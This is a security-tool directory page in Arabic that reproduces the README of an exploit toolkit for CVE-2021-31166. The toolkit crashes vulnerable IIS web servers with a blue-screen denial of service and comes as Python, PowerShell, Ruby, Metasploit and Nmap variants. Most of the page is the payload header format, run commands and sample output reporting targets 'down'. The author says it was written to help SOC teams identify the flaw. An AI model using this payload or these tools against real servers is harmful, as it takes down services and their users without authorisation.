Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-31166 — CVE-2021-31166: الاستغلال باستخدام Powershell وPython وRuby وNMAP وMetasploit. | Kitploit
أدوات/GitHubGitHub/mauricelambert/cve-2021-31166
ماسحات الثغرات الأمنيةأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبتطوير الحمولات
GitHubmauricelambert/cve-2021-31166

CVE-2021-31166

CVE-2021-31166: الاستغلال باستخدام Powershell وPython وRuby وNMAP وMetasploit.

عرض المستودع
65منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-31166

لماذا

لقد كتبت مؤخرًا استغلالًا (exploit) لـ CVE-2021-31166، وهو يستغل CVE-2021-31166 وCVE-2021-31166. يجب على مختبِر الاختراق استخدام https://github.com/mauricelambert/CVE-2021-31166، لكننا في فرق مراكز العمليات الأمنية (SOC) نحتاج إلى معرفة الثغرة المحددة لإصلاحها بشكل صحيح، ولهذا السبب كتبت هذا الاستغلال.

الوصف

أقترح نصوصًا برمجية بلغة بايثون الخالصة وباورشيل وروبي، ووحدات لميتاسبلويت وnmap لمهاجمة خادم ويب IIS معرّض للثغرة (تنفيذ هجوم حجب الخدمة DOS لتعطيل الخادم (الشاشة الزرقاء)).

الحمولة (Payload) بسيطة جدًا:

  • Accept-Enconding: something, ,
  • استبدل something بأي قيمة ترويسة تريدها
  • يجب أن تطابق: Accept-Enconding: (\w|[~/\.-]|%[0-9a-fA-F]{2})+,\s+,

تحقق من حمولتك باستخدام بايثون:

root@kitploit:~
from re import fullmatch
if fullmatch(r"Accept-Enconding: (\w|[~/\.-]|%[0-9a-fA-F]{2})+,\s+,", "Accept-Enconding: something, ,"):
    print("Payload is valid !")

الاستغلال: DOS - الشاشة الزرقاء

Python

root@kitploit:~
python3 CVE202131166.py
# OR
chmod u+x CVE202131166.py
./CVE202131166.py

python3 CVE202131166.py <target>
# OR
chmod u+x CVE202131166.py
./CVE202131166.py <target>

python3 CVE202131166.py 10.10.10.10
# OR
chmod u+x CVE202131166.py
./CVE202131166.py 10.10.10.10:8000
# OR
python3 CVE202131166.py mywebservername
root@kitploit:~
~# python CVE202131166.py

CVE-2021-31166  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Target: 10.10.10.10

[+] http://10.10.10.10 is UP. Send payload...
[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2021-31166.

~# 

Powershell

root@kitploit:~
powershell ./CVE-2021-31166.ps1
powershell ./CVE-2021-31166.ps1 mywebservername
powershell ./CVE-2021-31166.ps1 -Target 10.10.10.10
root@kitploit:~
cmd> powershell ./CVE-2021-31166.ps1

cmdlet CVE-2021-31166.ps1 at command pipeline position 1
Supply values for the following parameters:
target: 10.10.10.10:8000

CVE-2021-31166  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

cmd>

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb 10.10.10.10
root@kitploit:~
~# ruby CVE-2021-31166.rb

CVE-2021-31166  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Host (target): 10.10.10.10
[+] Target: 10.10.10.10 is vulnerable and down.

~#

Metasploit

وحدة بايثون

root@kitploit:~
msf6 > use exploit/windows/iis/py_dos_iis_2021_31166
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > exploit
[*] Running module against 127.0.0.1

[*] Starting server...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - Trying first connection...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - First connection OK. Sending payload...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) >

وحدة روبي

root@kitploit:~
msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166 
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 10.10.10.10

[+] Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >

Nmap

root@kitploit:~
nmap -p 80 --script dos_iis_2021_31166 10.10.10.10
root@kitploit:~
~# nmap -p 80 --script dos_iis_2021_31166 10.10.10.10
80/tcp open  http
| dos_iis_2021_31166:
|   VULNERABLE:
|   IIS CVE-2021-31166 DOS
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2021-31166
|                   The IIS Web Server contains a RCE vulnerability. This script
|                   exploits this vulnerability with a DOS attack
|                   (causes a Blue Screen).
|
|     Disclosure date: 2021-05-11
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2021-31166
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166
|_      https://github.com/mauricelambert/CVE-2021-31166

المصادر

  • Microsoft
  • nvd.nist.gov
  • توثيق نص روبي الخالص

الترخيص

مرخّص بموجب GPL، الإصدار 3.

تنزيل الأداة